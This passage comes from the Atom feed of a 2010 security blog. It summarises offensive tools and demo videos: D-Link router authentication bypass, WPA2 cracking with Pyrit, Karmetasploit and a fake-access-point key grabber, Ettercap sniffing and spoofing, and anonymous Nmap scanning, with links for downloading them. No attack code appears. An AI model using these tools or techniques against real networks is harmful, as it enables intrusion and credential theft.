decoding view state and creating view state attack vectors. The tool can be used to create XSS attacks and session and application scope attacks against Apache MyFaces 1.2.8 applications. The tool has been architected to be extensible and can be modified to support other versions of Apache MyFaces and Sun Mojarra. &lt;br /&gt;&lt;br /&gt;Check &lt;a href="https://www.trustwave.com/spiderLabs-tools.php"&gt;https://www.trustwave.com/spiderLabs-tools.php&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-137399158001694078?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/137399158001694078/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/spiderlabs-defacetool.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/137399158001694078'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/137399158001694078'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/spiderlabs-defacetool.html' title='SpiderLabs Defacetool'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-892691237692696761</id><published>2010-06-04T11:58:00.000+08:00</published><updated>2010-06-04T11:58:50.080+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cisco'/><title type='text'>D-Link Routers: One Hack to Own Them All</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Multiple D-Link Routers Vulnerable to Authentication Bypass&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;Multiple D-Link routers suffer from insecure implementations of the Home &lt;br /&gt;Network Administration Protocol which allow unauthenticated and/or &lt;br /&gt;unprivileged users to view and configure administrative settings on the &lt;br /&gt;router. &lt;br /&gt;&lt;br /&gt;Further, the mere existence of HNAP allows attackers to completely bypass &lt;br /&gt;the CAPTCHA login features that D-Link has made available in recent &lt;br /&gt;firmware releases. &lt;br /&gt;&lt;br /&gt;These vulnerabilities can be exploited by an individual inside the local &lt;br /&gt;network, as well as an external attacker. &lt;br /&gt;&lt;br /&gt;It is suspected that most, if not all, D-Link routers manufactured since &lt;br /&gt;2006 have HNAP support and are vulnerable. However, only the following &lt;br /&gt;routers and firmware versions have been confirmed to date: &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1)&lt;/span&gt; DI-524 hardware version C1, firmware version 3.23 &lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2)&lt;/span&gt; DIR-628 hardware version B2, firmware versions 1.20NA and &lt;br /&gt;1.22NA &lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3)&lt;/span&gt; DIR-655 hardware version A1, firmware version 1.30EA &lt;br /&gt;&lt;br /&gt;You can read full write-up &lt;a href="http://www.sourcesec.com/Lab/dlink_hnap_captcha.pdf"&gt;here&lt;/a&gt;, and download POC tool, &lt;span style="font-weight: bold;"&gt;HNAP0wn&lt;/span&gt;, &lt;a href="http://www.sourcesec.com/Lab/hnap0wn.tar.gz"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-892691237692696761?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/892691237692696761/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/d-link-routers-one-hack-to-own-them-all.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/892691237692696761'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/892691237692696761'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/d-link-routers-one-hack-to-own-them-all.html' title='D-Link Routers: One Hack to Own Them All'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3216814511329124633</id><published>2010-06-02T10:17:00.000+08:00</published><updated>2010-06-02T10:18:32.839+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Webraider</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_xJ5LrusWfss/S4kH8B_yI0I/AAAAAAAAATw/OPi2gIU56R4/s1600/webraider-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="181" src="http://2.bp.blogspot.com/_xJ5LrusWfss/S4kH8B_yI0I/AAAAAAAAATw/OPi2gIU56R4/s200/webraider-1.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;WebRaider is a plugin based automated web application exploitation tool which focuses to get a shell from multiple targets or injection point &lt;br /&gt;&lt;br /&gt;Internally WebRaider uses Metasploit. We use a specific version of Metasploit. We trim the fat from Metasploit to launch it faster and make it smaller. You can change the paths and make it work with the latest Metasploit of your own setup. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Note:&lt;/span&gt; Your antivirus won't like the WebRaider download package as it includes reverse shell executables and other metasploit files.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mavitunasecurity.com/webraider/"&gt;WebRaider Presentation and White Paper&lt;/a&gt; and &lt;a href="http://code.google.com/p/webraider/downloads/list"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3216814511329124633?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3216814511329124633/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/webraider.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3216814511329124633'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3216814511329124633'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/06/webraider.html' title='Webraider'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_xJ5LrusWfss/S4kH8B_yI0I/AAAAAAAAATw/OPi2gIU56R4/s72-c/webraider-1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8969079468187151963</id><published>2010-05-31T11:28:00.000+08:00</published><updated>2010-05-31T11:28:22.518+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Plecost: Wordpress Finger Printer</title><content type='html'>Wordpress finger printer tool, plecost search and retrieve information about the plugins versions installed in Wordpress systems. It can analyze a single URL or perform an analysis based on the results indexed by Google. Additionally displays CVE code associated with each plugin, if there. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_xJ5LrusWfss/S5gAT4iYGOI/AAAAAAAAAUY/-UqOE2TTZr8/s1600/output_plecost.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_xJ5LrusWfss/S5gAT4iYGOI/AAAAAAAAAUY/-UqOE2TTZr8/s320/output_plecost.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Plecost retrieves the information contained on Web sites supported by Wordpress, and also allows a search on the results indexed by Google. &lt;br /&gt;&lt;br /&gt;Download: &lt;a href="http://code.google.com/p/plecost/"&gt;http://code.google.com/p/plecost&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8969079468187151963?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8969079468187151963/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/plecost-wordpress-finger-printer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8969079468187151963'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8969079468187151963'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/plecost-wordpress-finger-printer.html' title='Plecost: Wordpress Finger Printer'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_xJ5LrusWfss/S5gAT4iYGOI/AAAAAAAAAUY/-UqOE2TTZr8/s72-c/output_plecost.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2206565766512585985</id><published>2010-05-27T11:27:00.000+08:00</published><updated>2010-05-27T11:29:23.147+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Clickjacking</title><content type='html'>Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.&lt;br /&gt;&lt;br /&gt;Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice.&lt;br /&gt;&lt;br /&gt;This new browser-based tool allows a user to experiment with clickjacking techniques by using point-and-click to visually select different elements within a webpage to be targeted. The tool also allows several 'next-generation' clickjacking techniques to be used, as introduced in Paul Stone's Blackhat Europe 2010 talk. &lt;br /&gt;&lt;br /&gt;Among the features of the new tool are:&lt;br /&gt;Use point-and-click to select the areas of a page to be targeted&lt;br /&gt;Supports the new 'text-field injection' technique&lt;br /&gt;Supports the new 'content extraction' technique&lt;br /&gt;'Visible mode' replay allowing a user to see how the technique works behind the science&lt;br /&gt;'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.&lt;br /&gt;The tool is currently in an early beta stage, and works best in Firefox 3.6. Full support for other browsers will follow shortly. For further information, please see the Readme.txt file in the downloadable tool.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;http://www.contextis.co.uk/resources/tools/clickjacking-tool/cjtool.zip&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-2206565766512585985?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/2206565766512585985/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/clickjacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2206565766512585985'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/2206565766512585985'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/clickjacking.html' title='Clickjacking'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6871484042887027415</id><published>2010-05-24T15:37:00.000+08:00</published><updated>2010-05-24T15:37:31.060+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wireless'/><title type='text'>Cracking WPA2 Password Using Pyrit (GPU Cracking)</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/HY9Y99bOyhE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/HY9Y99bOyhE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt; &lt;br /&gt;&lt;br /&gt;In this video its shown how to attack Wireless Networks using Pyrit tool. Pyrit is a GPU cracker for attacking WPA/WPA2 PSK protocols. It allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK. Download and other details can be found &lt;a href="http://code.google.com/p/pyrit/"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6871484042887027415?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6871484042887027415/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/cracking-wpa2-password-using-pyrit-gpu.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6871484042887027415'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6871484042887027415'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/cracking-wpa2-password-using-pyrit-gpu.html' title='Cracking WPA2 Password Using Pyrit (GPU Cracking)'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3106450524828336578</id><published>2010-05-20T15:46:00.000+08:00</published><updated>2010-05-20T15:49:58.667+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Nmap'/><title type='text'>Nmap Using TOR Networks</title><content type='html'>&amp;nbsp;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/7PVNt7D5LHw&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/7PVNt7D5LHw&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;A good video showing how to scan networks with Nmap using Tor network to stay anonymous.&lt;br /&gt;An Attacker downloads and configure &lt;a href="http://www.thoughtcrime.org/software/tortunnel/"&gt;TorTunnel&lt;/a&gt;,&lt;a href="http://www.torproject.org/"&gt;TOR&lt;/a&gt; bundle and &lt;a href="http://proxychains.sourceforge.net/"&gt;proxychains&lt;/a&gt;. After setting up everything, an attacker uses nmap to find out the services running on different IP addresses. The main purpose of this video to stay anonymous while scanning different networks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3106450524828336578?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3106450524828336578/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/nmap-using-tor-networks.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3106450524828336578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3106450524828336578'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/nmap-using-tor-networks.html' title='Nmap Using TOR Networks'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5861123930986077080</id><published>2010-05-17T15:48:00.000+08:00</published><updated>2010-05-17T15:49:36.966+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Proof of Concept'/><title type='text'>Milw0rm Exploits Archive</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/r6IDjVtmt38&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/r6IDjVtmt38&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;A live demo on how to use the latest exploits from milw0rm.com on backtrack live distro in detail. In this video, the attacker launches an attack against a Dream FTP Server to crack the administrator 's password running on a windows box.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5861123930986077080?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5861123930986077080/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/milw0rm-exploits-archive.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5861123930986077080'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5861123930986077080'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/milw0rm-exploits-archive.html' title='Milw0rm Exploits Archive'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1983588752595368283</id><published>2010-05-13T12:07:00.000+08:00</published><updated>2010-05-13T12:10:13.941+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Backtrack'/><title type='text'>Karmetasploit on Backtrack4</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Ne7hof-w0kU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Ne7hof-w0kU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;This video is about using &lt;a href="http://www.metasploit.com/users/hdm/tools/karma.rc"&gt;karma exploit&lt;/a&gt; from Metasploit on Backtrack 4. An Attacker will setup his own fake Access Point in monitor mode, DHCP daemon and a web server daemon. Attacker runs Metasploit's karma exploit. The moment an IP address is assigned to the victim's PC, all the activity is logged at the attacker's machine including the URL visited and credentials used for mail and web access.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1983588752595368283?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1983588752595368283/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/karmetasploit-on-backtrack4.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1983588752595368283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1983588752595368283'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/karmetasploit-on-backtrack4.html' title='Karmetasploit on Backtrack4'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-8192518154490875393</id><published>2010-05-10T22:25:00.002+08:00</published><updated>2010-05-13T11:58:33.318+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Application Security'/><title type='text'>Sniffing And HTML Injection</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/YOG9aMDyCwI&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt; &lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt; &lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt; &lt;/param&gt;&lt;embed src="http://www.youtube.com/v/YOG9aMDyCwI&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;This video explains various examples of network sniffing and HTML injection with Ettercap-NG tool on BackTrack-4 on a Local Area Network. It shows how an attacker can change text of chat messages within LiveMessanger using ettercap filters and also using Ettercap plugin, Filters, filterf_modify, file-inject. An Attacker can even find who else is ARP poisoning on LAN using search_poisoning ettercap plugin.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-8192518154490875393?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/8192518154490875393/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/sniffing-and-html-injection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8192518154490875393'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/8192518154490875393'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/sniffing-and-html-injection.html' title='Sniffing And HTML Injection'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3823231884609285511</id><published>2010-05-05T17:27:00.001+08:00</published><updated>2010-05-05T17:32:52.132+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wireless'/><title type='text'>Wireless Key Grabber</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/F8SoKrJoA5M&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/F8SoKrJoA5M&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;This video shows how to use Wireless Key Grabber. It requires lighttpd and it runs a fake wireless access point to grab wireless keys. Whenever a user tries to connect to any website after connecting to this fake access point, his browser is forwarded to a customized URL. Metasploit DLL injection is used to grab wireless key.&lt;br /&gt;&lt;br /&gt;Download link is here : http://www.megaupload.com/?d=Z1TZEFDG&lt;br /&gt;Script information is here  : http://pastebin.com/f29b60836&lt;br /&gt;&lt;a dir="ltr" href="http://pastebin.com/f29b60836" rel="nofollow" target="_blank" title="http://pastebin.com/f29b60836"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3823231884609285511?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3823231884609285511/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/wireless-key-grabber.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3823231884609285511'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3823231884609285511'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/wireless-key-grabber.html' title='Wireless Key Grabber'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6220149146167540745</id><published>2010-05-03T16:53:00.001+08:00</published><updated>2010-05-05T16:54:51.267+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ettercap'/><title type='text'>DNS Spoofing And Browser Spying Part 2</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/vS9v0poMr3s&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/vS9v0poMr3s&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;In this video an attacker sniffs network traffic from a remote machine using ARP and DNS Spoofing with Ettercap.Uses Driftnet program to listens to network traffic and sniff out images from TCP streams on the network.And finally uses remote_browser plugin of ettercap which sends visited URLs of the victim to attackers browser.Like this an attacker's browser follows what ever the victim is browsing.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6220149146167540745?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6220149146167540745/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/05/dns-spoofing-and-browser-spying-part-2.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6220149146167540745'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6220149146167540745'/><link rel='alternate' type='text/html' 